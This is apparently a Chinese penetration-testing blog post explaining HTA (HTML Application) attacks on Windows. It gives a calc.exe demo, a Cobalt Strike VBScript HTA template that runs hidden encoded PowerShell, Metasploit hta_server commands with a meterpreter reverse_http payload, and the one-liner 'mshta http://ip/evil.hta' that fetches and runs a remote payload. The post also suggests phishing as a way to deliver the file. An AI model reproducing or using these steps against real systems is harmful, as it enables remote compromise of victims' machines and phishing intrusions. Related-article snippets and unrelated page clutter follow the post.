HTA(html应用程序)攻击

最新推荐文章于 2024-04-25 16:53:11 发布
最新推荐文章于 2024-04-25 16:53:11 发布
阅读量3.8k 收藏 10
点赞数 2
分类专栏: 渗透测试 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zlirving_/article/details/113983549
版权
HTA 介绍

HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别

大多数的Windows操作系统都支持Hta文件执行,可双击运行hta应用或命令行窗口mshta.exe解析执行文件,这里的.hta文件可以是本地的也可以是可访问的远程主机上的

HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多。它具有桌面程序的所有权限(读写文件、操作注册表等)

HTA 简单用法

可双击运行hta应用或命令窗口mshta.exe解析执行

<script>
	hta = new ActiveXObject("WScript.Shell");
	hta.run("%windir%\\System32\\cmd.exe /c calc.exe", 0);  
	window.close();
</script>

保存为HTA文件后就可以打开 执行后会弹出计算器
在这里插入图片描述

CS中利用

生成一个远端HTA恶意脚本
在这里插入图片描述
设置监听器
Method(payload)建议使用powershell,担心部分系统版本不兼容
在这里插入图片描述
HTML应用文件生成好后,来到Attacks --> Web Drive-by --> Host File,选择刚才生成的文件,最后点击Launch,复制CS创建的链接,在目标主机上打开此链接
在这里插入图片描述
在这里插入图片描述
浏览器访问链接即可下载该hta文件,这种方式也可用于钓鱼
在这里插入图片描述
也可以在目标机器的命令行窗口上执行 mshta http://ip/evil.hta 即可完成上线
在这里插入图片描述
默认情况下,这是以powershell作为payload的hta文件

<script language="VBScript">
	Function var_func()
		Dim var_shell
		Set var_shell = CreateObject("Wscript.Shell")
		var_shell.run "powershell -nop -w hidden -encodedcommand [powershell脚本内容], 0, true
	End Function

	var_func
	self.close
</script>
MSF中利用
use exploit/windows/misc/hta_server
set payload windows/meterpreter/reverse_http
set lhost ip
set lport 监听端口
exploit -j

在这里插入图片描述
同样,在目标机器的命令行窗口上执行 mshta http://ip/evil.hta 即可完成上线
在这里插入图片描述
GOT IT!

 
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~

想冲大厂的癞蛤蟆
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用mshta.exe绕过应用程序白名单(多种方法)
weixin_30932215的博客
03-07 627
0x00 简介 很长一段时间以来,HTA文件一直被web攻击或在野恶意软件下载程序用作恶意程序的一部分。HTA文件在网络安全领域内广为人知,从红队和蓝队的角度来看,它是绕过应用程序白名单有价值的“古老”方式之一。运行Microsoft HTML应用程序主机的Mshta.exe,Windows OS实用程序负责运行HTAHTML应用程序文件。我们可以运行JavaScript或Visual...
Kali 渗透测试:利用HTA文件进行渗透攻击
Liu_Bruce的博客
05-13 1992
Kali 渗透测试:利用HTA文件进行渗透攻击 由于浏览器安全技术发展很快,很多时候面对一些安全的浏览器(就是暂时没有发现漏洞的浏览器), 这时通常需要选择一种不需要依赖漏洞的手段,这种手段看起来是个正常的行为,如让访问伪造网站的受害者下载一个插件,但是这个文件不能是EXE文件这种很容易被发现的文件, 因此,HTML应用程序HTML Application,HTA文件就成了最好的选择。 HTA文件可以使用HTML中的绝大多数标签、脚本等。直接将HTML保存成HTA文件,就是一个能够独立运行的软件。与普通
4.2 “.hta”恶意文件分析
最新发布
A345545108的博客
04-25 304
hta 文件是一种 HTML 应用程序HTML Application)的文件类型,它允许使用 HTML、JavaScript和VBScript创建一个本地的Windows应用程序攻击者也可以有目的编写JavaScript和VBScript做恶意用途。“.hta文件执行后,会展示与诱饵pdf主题配套的html界面迷惑用户,同时会执行包含在其中的恶意JavaScript。经过格式化和解除混淆完整JavaScript代码如下。格式化经过混淆的JavaScript下载器。经调试获取外连URL。
内网渗透神器CobaltStrike之钓鱼攻击(六)
xf555er的博客
11-22 2803
office钓鱼在无需交互、用户无感知的情况下,执行Office文档中内嵌的一段恶意代码,从远控地址中下载并运行恶意可执行程序,例如远控木马或者勒索病毒等。Cobalt Strike office钓鱼主要方法是生成一段vba代码,然后将代码复制到office套件中,当用户启动office自动运行lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。
HTA的简单应用
aome1470的博客
11-04 501
HTA简介:HTAHTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件没什么差别。下面是一个HTA的例子:<!—example1.hta--><html><head> <title>第一个HTA的例子</t...
浅谈HTA(HTML Application)和病毒
yunxiang1224的博客
03-19 2536
HTA是什么 HTAHTML应用程序HTML Application)的缩写,可以使用html中的绝大多数标签、脚本等。直接将HTML保存成HTA的格式,就是一个能够独立运行的应用软件。 与普通HTML网页相比,它多了个HTA:APPLICATION标签,其实就是这个标签提供了一系列面向应用程序的功能。最重要的是:它能够让你访问客户的机器,而不用担心安全的限制。 运行后缀名为hta的文...
细说——Cobalt Strike钓鱼
LainWith的博客
10-10 2352
目录启动环境windows服务端启动windows启动客户端HTA恶意文件投递1. 生成恶意HTA2. HTA利用3. 上钩信息收集(System Profiler)1. 生成恶意地址2. 战果网站克隆http类型网站1. 克隆网站2. 受害者访问克隆站点3. 监视日志https类型网站网站克隆+木马下载1. 准备木马2. 生成木马地址3. 克隆网站4. 受害者上钩参考 总结了网上关于Cobalt Strike钓鱼的相关文章,合并成了这篇学习笔记 启动环境 环境介绍: win7(虚拟机) 【攻击者】—
HTA-Exploit-:Microsoft Windows HTAHTML应用程序)-远程执行代码
05-14
"HTA-Exploit-:Microsoft Windows HTAHTML应用程序)-远程执行代码"这个标题揭示了一个安全问题,即存在恶意攻击者可能利用HTA文件进行远程代码执行的可能性。这种攻击方式通常发生在用户打开或下载了包含恶意HTA...
HTA小程序
05-29
HTA小程序】是一种基于HTML、CSS和JavaScript的应用程序,全称为HTML Application。它利用了Microsoft的ActiveX技术,可以在Windows环境中运行,提供类似于桌面应用的交互体验。HTA文件通常以.hta为扩展名,运行时...
好玩的小程序 用hta做的(非原创)
05-09
这个标题和描述提及的“好玩的小程序 用hta做的”是指使用HTML应用程序HTML Application,简称HTA)技术创建的一个有趣的应用程序HTA是一种特殊类型的Windows应用程序,它使用HTML、CSS和JavaScript等Web技术,...
asp去除html标记与空格的正则
12-02
- **HTA文件去除html控件认证和接收命令行参数**:HTAHTML应用程序)是基于HTML的桌面应用,可以处理更高级的功能,如命令行参数和安全控制。 - **asp.net去除html的函数代码**:ASP.NET是ASP的升级版,提供了更多...
spss 简明教程(全)
08-07
第一章 SPSS的安装与概貌 7 第一节 SPSS的安装 7 1.1.1 SPSS简介 7 1.1.2 SPSS的安装 7 第二节SPSS的界面初识 10 1.2.1 SPSS的启动 10 1.2.2 SPSS的主窗口 11 1.2.3 SPSS的菜单 11 1.2.4 SPSS的其他窗口 12 1.2.5 SPSS的退出 12 1.2.6 SPSS的求助系统 12 第二章SPSS的数据管理 13 第一节 数据的输入 13 2.1.1 变量的定义 13 2.1.2 数据格式化 13 2.1.3 数据的输入 14 2.1.4 缺失值处理 15 2.1.5 变量标签 16 2.1.6 数据管理器列宽定义 16 第二节 数据的编辑 17 2.2.1 数据的增删 17 2.2.2 数据的整理 18 2.2.3 数据的算术处理 23 第三节 数据文件的管理 27 2.3.1 数据文件的调用 27 2.3.2 数据文件的连接 28 2.3.3 数据文件的保存 29 第三章 SPSS文本文件的编辑 30 第一节 文本文件的管理 31 3.1.1 文件的生成 31 3.1.2 文件的保存 32 3.1.3 文件的调用 32 3.1.4 文件的打印 32 第二节 文本文件的编辑 32 3.2.1 文本中文字的增删与修改 32 3.2.2 文本的选择 33 3.2.3 文本块的删除、移动与复制 33 3.2.4 文本块的打印 33 3.2.5 文本中文字的查找 34 3.2.6 文本中文字的替换 34 第四章 摘要性分析 35 第一节 Frequencies过程 35 4.1.1 主要功能 35 4.1.2 实例操作 35 第二节 Descriptives过程 39 4.2.1 主要功能 39 4.2.2 实例操作 40 第三节 Explore过程 42 4.3.1 主要功能 42 4.3.2 实例操作 42 第四节 Crosstabs过程 47 4.4.1 主要功能 47 4.4.2 实例操作 47 第五章 平均水平的比较 51 第一节 Means过程 52 5.1.1 主要功能 52 5.1.2 实例操作 52 第二节 Independent-Samples T Test过程 55 5.2.1 主要功能 55 5.2.2 实例操作 55 第三节 Paired-Samples T Test过程 57 5.3.1 主要功能 57 5.3.2 实例操作 57 第四节 One-Way ANOVA过程 59 5.4.1 主要功能 59 5.4.2 实例操作 60 第六章 方差分析 63 第一节 Simple Factorial过程 63 6.1.1 主要功能 63 6.1.2 实例操作 63 第二节 General Factorial过程 66 6.2.1 主要功能 66 6.2.2 实例操作 66 第三节 Multivarite过程 69 6.3.1 主要功能 69 6.3.2 实例操作 69 第七章 相关分析 78 第一节 Bivariate过程 78 7.1.1 主要功能 78 7.1.2 实例操作 78 第二节 Partial过程 81 7.2.1 主要功能 81 7.2.2 实例操作 81 第三节 Distances过程 83 7.3.1 主要功能 83 7.3.2 实例操作 83 第八章 回归分析 87 第一节 Linear过程 87 8.1.1 主要功能 87 8.1.2 实例操作 88 第二节 Curve Estimation过程 91 8.2.1 主要功能 91 8.2.2 实例操作 91 第三节 Logistic过程 94 8.3.1 主要功能 94 8.3.2 实例操作 94 第四节 Probit过程 97 8.4.1 主要功能 97 8.4.2 实例操作 97 第五节 Nonlinear过程 101 8.5.1 主要功能 101 8.5.2 实例操作 102 第九章 对数线性模型 105 第一节 General过程 106 9.1.1 主要功能 106 9.1.2 实例操作 106 第二节 Hierarchical过程 110 9.2.1 主要功能 110 9.2.2 实例操作 110 第三节 Logit过程 117 9.3.1 主要功能 117 9.3.2 实例操作 117 第十章 分类分析 122 第一节 K-Means Cluster过程 123 10.1.1 主要功能 123 10.1.2 实例操作 123 第二节 Hierarchical Cluster过程 127 10.2.1 主要功能 127 10.2.2 实例操作 127 第三节 Discriminant过程 132 10.3.1 主要功能 132 10.3.2 实例操作 132 第十一章 因子分析 138 11.1 主要功能 138 11.2 实例操作 138 第十二章 可靠性分析 145 12.1 主要功能 145 12.2 实例操作 145 第十三章 非参数检验 150 第一节 Chi-Square过程 150 13.1.1 主要功能 150 13.1.2 实例操作 151 第二节 Binomial过程 153 13.2.1 主要功能 153 13.2.2 实例操作 153 第三节 Runs过程 154 13.3.1 主要功能 154 13.3.2 实例操作 154 第四节 1-Sample K-S过程 156 13.4.1 主要功能 156 13.4.2 实例操作 156 第五节 2 Independent Samples过程 157 13.5.1 主要功能 157 13.5.2 实例操作 157 第六节 k Independent Samples过程 159 13.6.1 主要功能 159 13.6.2 实例操作 159 第七节 2 Related Samples过程 160 13.7.1 主要功能 160 13.7.2 实例操作 161 第八节 K Related Samples过程 163 13.8.1 主要功能 163 13.8.2 实例操作 163 第十四章 生存分析 165 第一节 Life Tables过程 165 14.1.1 主要功能 165 14.1.2 实例操作 165 第二节 Kaplan-Meier过程 169 14.2.1 主要功能 169 14.2.2 实例操作 169 第三节 Cox Regression过程 173 14.3.1 主要功能 173 14.3.2 实例操作 173 第十五章 统计图的绘制 179 第一节 直条图 179 15.1.1 主要功能 179 15.1.2 实例操作 179 第二节 线图 181 15.2.1 主要功能 181 15.2.2 实例操作 181 第三节 区域图 183 15.3.1 主要功能 183 15.3.2 实例操作 183 第四节 构成图 185 15.4.1 主要功能 185 15.4.2 实例操作 185 第五节 高低区域图 187 15.5.1 主要功能 187 15.5.2 实例操作 187 第六节 直条构成线图 188 15.6.1 主要功能 188 15.6.2 实例操作 189 第七节 质量控制图 190 15.7.1 主要功能 190 15.7.2 实例操作 190 第八节 箱图 193 15.8.1 主要功能 193 15.8.2 实例操作 193 第九节 均值相关区间图 195 15.9.1 主要功能 195 15.9.2 实例操作 195 第十节 散点图 197 15.10.1 主要功能 197 15.10.2 实例操作 197 第十一节 直方图 199 15.11.1 主要功能 199 15.11.2 实例操作 199 第十二节 正态概率分布图 201 15.12.1 主要功能 201 15.12.2 实例操作 202 第十三节 正态概率单位分布图 203 15.13.1 主要功能 203 15.13.2 实例操作 203 第十四节 普通序列图 207 15.14.1 主要功能 207 15.14.2 实例操作 207 第十五节 时间序列图 208 15.15.1 主要功能 208 15.15.2 实例操作 208
windowshta很好玩
03-18
NULL 博文链接:https://aleelock.iteye.com/blog/614974
HTA
03-21
NULL 博文链接:https://q445862108.iteye.com/blog/935438
hta格式程序详解
07-22
适合初学者。本学习资料仅对HTA格式的程序进行了大概的解说,可以自己创建一个HTA格式的程序
文件夹加密 &系统维护 V1.3.4[绿色无毒便携支持WIN7].hta
09-24
<p>对于该工具的开发,我只是作为业余爱好。Windows桌面应用了解的不多。不过在经过近一年的PHP开发和网站建设方面的经验积累后,对解释性的脚本语言颇有感觉。只是界面设计还有配色方面的艺术天份比较少,于是东拼西凑,移花接木,最终感觉还不错,呵呵,自我安慰。</p><p>文件夹伪装主要是在Windows下面建立特殊文件夹,所谓的特殊就是文件名中包含一些常规情况下不能使用的字符。所以该文件夹本质上和普通文件夹没什么区别,只是减少了窗口模式对文件夹的复制、粘贴、删除、移动等操作,安全性比较高。该版本在Win7下第一级目录可以双击打开,之后就进不了了。Linux系统下将无法读取这种特殊文件夹,希望注意。还有请不要在第一级目录下放文件。有了这个特殊文件夹,放到U盘或移动硬盘上,就可以不用担心丢失后数据被人查看了。如果没有密码,除了格式化,文件夹是不能删除的。</p><p>字符随机加密主要用来保护字符串。比如银行卡密码,网上注册的各种帐号密码,如果你用一个文件把这些密码明文放在里面,很容易被别人查看。该功能可以将那些密码进行加密(即使是同一个字符串编码后的字符串也是不同的,这样破解的几率就非常小了),然后存在一个文本文件里面。需要查看的时候,再用该功能的解密方式就可以查看了。本人一直使用这种方式把所有的帐号密码放到手机通讯录里面。然后用手机IE就可以打开解密,虽然有点麻烦,不过很安全,而且密码太多,懒得记。如果需要定制请联系我。该功能为测试阶段,请慎重考虑是否使用,由此造成的损失与作者无关。</p><p>万年历从1900年到2049年,包含了阴历和阳历,中西方的节假日也比较完整,另外包含了世界时区转换。</p><p>系统工具、控制面板、注册表包含的功能与实际的操作系统有关,有些点击了没反映,说明当前系统不支持。</p><p>WMI class即是Windows 管理规范(Windows Management Instrumentation)。是一项核心的 Windows 管理技术。在此提供了一些API,以共学习。</p><p>其他一些工具有的是网上收集,整理并集合在一起了。</p><p>存储容量:8bit(比特) > 1024Byte(字节) > 1024KB(千kilobyte) > 1024MB(兆megabyte) > 1024GB(吉gigabyte) > 1024TB(太terabyte) > 1024PB(拍petabyte) > 1024EB(艾exabyte) > 1024ZB(泽zettabyte) > 1024YB(尧yottabyte) > 1024NB(nonabyte) > 1024DB(doggabyte)</p>
计算机应用技术(实用手册)
07-29
当设定为[Enabled](启动)时,这个项目在系统电源开启之后,可加速POST(Power On Self Test)的程序。BIOS会在POST过程当中缩短或是跳过一些检查项目,从而加速启动等待的时间! Hard Disk Boot Priority(硬盘...
利用HTA文件绕过杀软及邮件钓⻥
Ms08067安全实验室
01-15 915
点击上方“蓝字”关注我们本文作者:jokelove(Ms08067内网安全小组成员)0x01 基础HTAHTML Application的缩写,本⽂介绍HTA在内⽹渗透中的⼏种...
网页应用程序hta-有意思
On the way
01-08 3902
HTA与普通的网页结构差不多,所以设计出来很容易,最简单的方法就是把设计好的html文件后缀直接改为.hta 当然HTA还有许多自己独特的属性: HTA的外观可以用来设定HTA应用程序的外观,如标题栏、边框大小等,必须放在中。 以下是一个完整的hta实例: 第一个HTA的例子 <HTA:Application ID="oHTA"    Applicationname="myApp
hta代码中怎么使用JavaScript脚本
05-31
HTML 中使用 JavaScript 脚本可以通过以下几种方式: 1. 在 HTML 文件中直接嵌入 JavaScript 代码: ``` <script type="text/javascript"> // JavaScript 代码 </script> ``` 2. 在 HTML 文件中引入外部 JavaScript 文件: ``` <script type="text/javascript" src="脚本文件路径"></script> ``` 3. 在 HTML 标签中使用事件属性绑定 JavaScript 代码: ``` <button onclick="javascript代码">按钮</button> ``` 4. 在 URL 中使用 JavaScript 代码: ``` <a href="javascript:javascript代码">链接</a> ``` 需要注意的是,上述方式中的 JavaScript 代码应该放在 `<script>` 标签中或者在 `href` 或事件属性中直接书写,而不是在 HTML 标签中直接书写。同时,为了避免代码冲突,建议在 JavaScript 代码中使用函数或对象等封装方式进行编写。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值